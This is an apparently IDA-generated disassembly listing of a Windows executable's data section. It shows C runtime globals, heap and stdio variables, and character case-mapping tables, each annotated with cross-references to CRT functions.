; __ValidateEH3RN+191�o ...
; int dword_40B8F4
dword_40B8F4 dd 0 ; DATA XREF: _wctomb:loc_405C2C�r
; ___crtLCMapStringA+265�r ...
dd 3 dup(0)
; int dword_40B904
dword_40B904 dd 0 ; DATA XREF: _wctomb+41�r
; .text:0040658A�r ...
dd 0
dword_40B90C dd 0 ; DATA XREF: ___security_error_handler+17�r
; .text:004073ED�r ...
dword_40B910 dd 0 ; DATA XREF: __sopen+3D�r
dword_40B914 dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_40B918 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
; int dword_40B91C
dword_40B91C dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_40B920 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp+14D�w ...
dd 7 dup(0)
byte_40B940 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_40B941 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_40BA44
dword_40BA44 dd 4E4h ; DATA XREF: __ismbbkana�r _setSBCS+10�w ...
align 10h
dword_40BA50 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_40BA60 db 0 ; DATA XREF: _setSBUpLow:loc_406704�w
; _setSBUpLow:loc_406721�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh, 0
; void *dword_40BB64
dword_40BB64 dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_40BB68 dd 0 ; DATA XREF: .text:004042C1�r
; .text:0040430B�r ...
dword_40BB6C dd 0 ; DATA XREF: .text:004042D1�r
; .text:loc_404315�r ...
dword_40BB70 dd 0 ; DATA XREF: __heap_alloc+E�r
; __get_sbh_threshold+E�r ...
dword_40BB74 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_40BB78 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_40BB7C dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_40BB80 dd 320000h ; DATA XREF: __heap_alloc+38�r
; _free+2A�r ...
dword_40BB84 dd 1 ; DATA XREF: __heap_alloc�r
; __heap_alloc:loc_402112�r ...
dword_40BB88 dd 3225B0h ; DATA XREF: _flsall:loc_402C51�r
; ___initstdio+2B�w ...
dd 5 dup(0)
dword_40BBA0 dd 400h dup(0) ; DATA XREF: .data:off_40B070�o
; .data:0040B078�o
; size_t dword_40CBA0
dword_40CBA0 dd 200h ; DATA XREF: _flsall+9�r _flsall+56�r ...
dword_40CBA4 dd 20h ; DATA XREF: __read+B�r __ioinit+1F�w ...
dd 6 dup(0)
dword_40CBC0 dd 320650h ; DATA XREF: _ftell+57�r __filbuf+74�r ...
dword_40CBC4 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
dword_40CCC0 dd 1 ; DATA XREF: .text:00402B12�o
; __setenvp+9F�w ...
dword_40CCC4 dd 322DB4h ; DATA XREF: _doexit+3E�r
; _doexit:loc_40289F�r ...
; void *dword_40CCC8
dword_40CCC8 dd 322DB8h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_40CCCC dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_40CCD0 dd 0 ; DATA XREF: __cinit�r
dword_40CCD4 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_403D7F�r ...
_data ends
; Section 4. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000CE00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40D000h
align 2000h
_idata2 ends
end start